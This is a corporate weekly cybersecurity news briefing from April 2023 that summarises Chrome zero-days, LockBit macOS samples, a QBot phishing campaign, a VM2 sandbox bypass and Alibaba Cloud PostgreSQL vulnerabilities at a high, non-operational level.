Cyber Security Weekly Briefing, 15 – 21 April

Telefónica Tech    21 April, 2023

Google fixes two new actively exploited 0-day vulnerabilities

Google has issued new security advisories on the identification of 0-day vulnerabilities affecting the Chrome browser that are being actively exploited.

The security flaw has been reported as CVE-2023-2033. This vulnerability is due to a flaw in the Chrome V8 JavaScript engine that could allow a malicious actor to remotely exploit the vulnerability via a specially crafted HTML page.

On the one hand, the security flaw, CVE-2023-2136, is in the cross-platform 2D graphics library, Skia, and, if exploited, could lead to incorrect graphics rendering, memory corruption or remote code execution that results in unauthorised system access.

More info

LockBit samples found targeting macOS systems

MalwareHunterTeam has found a sample LockBit file that contains the ability to infect multiple operating systems, including, for the first time, Apple’s macOS.

MalwareHunterTeam highlights that this is a remarkable milestone as it is also the first time that one of the major ransomware groups has been known to create malware specifically targeting macOS.

The file found includes an encryptor called ‘locker_Apple_M1_64’, for newer Apple devices, and another for PowerPC CPUs, used by older macOS.

An in-depth analysis of the file shows that, so far, this is an early version of this LockBit strain and could not be used in a real attack, but it shows the interest of this ransomware in attacking macOS devices in the near future.

More info

New QBot campaign identified

Security researchers have published an analysis of the TTPs used in a new campaign of the well-known Qbot malware, which now attacks victims through the use of PDF files and Windows Script Files (WSF).

This phishing campaign is distributed via emails that use legitimate email threads and contain an attached PDF file that, when opened, will download a ZIP file containing a WSF file. This file ultimately aims to execute a PowerShell script, which attempts to download a QBot DLL.

It is worth noting that numerous actors such as BlackBasta, REvil, PwndLocker, Egregor, ProLock and MegaCortex have used Qbot for initial access to corporate networks.

This initial access is done by deploying additional payloads such as Cobalt Strike, Brute Ratel and other malware that allow access to the compromised device..

More info

New PoC enables VM2 sandbox bypassing

Security researchers have released a new PoC capable of bypassing the VM2 sandbox, widely used in the development and security world to run and test untrusted code in an isolated environment.

This bypass would allow malware to run outside the constraints of the sandbox environment. The first vulnerability was identified as CVE-2023-29017 a fortnight ago, and the last two identified as CVE-2023-29199 and CVE-2023-30547.

The latter vulnerability, with a CVSS of 9.8, can be exploited by malicious actors due to a sanitisation flaw that allows the attacker to throw a host exception inside “handleException()”.

Users are advised to fix the vulnerability by upgrading to version 3.9.17 as soon as possible to avoid a potential security incident.

More info

​Critical Vulnerabilities in Alibaba Cloud PostgreSQL Databases

Security researchers at Wiz have published a paper disclosing two critical vulnerabilities in Alibaba Cloud’s PostgreSQL databases.

According to the researchers, these flaws allowed unauthorised access to Alibaba Cloud customers’ PostgreSQL databases, which could lead to a supply chain attack and remote code execution.

It should be noted that the vulnerabilities, which have been named BrokenSesame, were reported to Alibaba Cloud in December 2022, who deployed mitigations on 12 April, although there is no evidence of exploitation.

In conclusion, this is a flaw that would allow privilege escalation in AnalyticDB and another for remote code execution in ApsaraDB RDS.

More info

Featured photo: Clark van der Beken / Unsplash